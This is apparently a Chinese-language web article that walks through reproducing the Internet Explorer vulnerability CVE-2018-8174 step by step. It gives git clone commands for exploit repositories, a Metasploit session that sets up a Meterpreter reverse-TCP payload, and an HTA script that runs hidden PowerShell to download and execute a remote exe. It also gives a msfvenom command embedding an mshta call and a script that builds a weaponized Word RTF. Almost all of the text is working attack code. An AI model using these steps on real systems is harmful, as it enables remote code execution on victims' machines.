您好,登錄后才能下訂單哦!
今天就跟大家聊聊有關怎么實現0day漏洞CVE-2018-8174的復現,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。
未打補丁系統,IE瀏覽器打開此地址會彈出計算器 。
http://test.lr3800.com/CVE-2018-8174_PoC.html
下載 metasploit 模塊到本地
git clone https://github.com/0x09AL/CVE-2018-8174-msf.git
將CVE-2018-8174.rb復制到 fileformat 目錄
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
將CVE-2018-8174.rtf復制到 exploits 目錄
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
啟動 metasploit
use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit
復制 /root/.msf4/local/目錄中的 msf.rtf 文件到目標主機上使用word文檔打開
或者IE瀏覽器打開 http://192.168.0.116:8080 即可獲得會話
利用 mshta 從遠程服務器下載文件執行。
請先下載poc附件,下文中使用 鏈接:https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密碼:ci8h
1.構造HTA文件,當訪問hta文件就會觸發powershell下載文件至臨時目錄執行
準備你的xx.exe文件上傳至站點目錄,假如得到地址 http://xxx.com/xxx.exe
HTA代碼:
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>
把該文件命名 8174.hta 上傳至站點目錄;假如得到地址 http://xxx.lr3800.com/8174.hta
2.使用msfvenom生成 js Shellcode
msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86
把生成的Shellcode字符替換至 8174poc.html 166行代碼
把 8174poc.html 文件上傳至站點目錄 假如得到地址 http://xxx.lr3800.com/8174poc.html
3.生成Word文檔
* 下載python腳本保存本地
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
運行 CVE-2018-8174.py
python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf
得到目錄中的 “exp.rtf ”文件,使用Word文檔打開即可下載執行xx.exe文件,或者IE瀏覽器打開 http://xxx.lr3800.com/8174poc.html 即可下載執行xx.exe文件
看完上述內容,你們對怎么實現0day漏洞CVE-2018-8174的復現有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。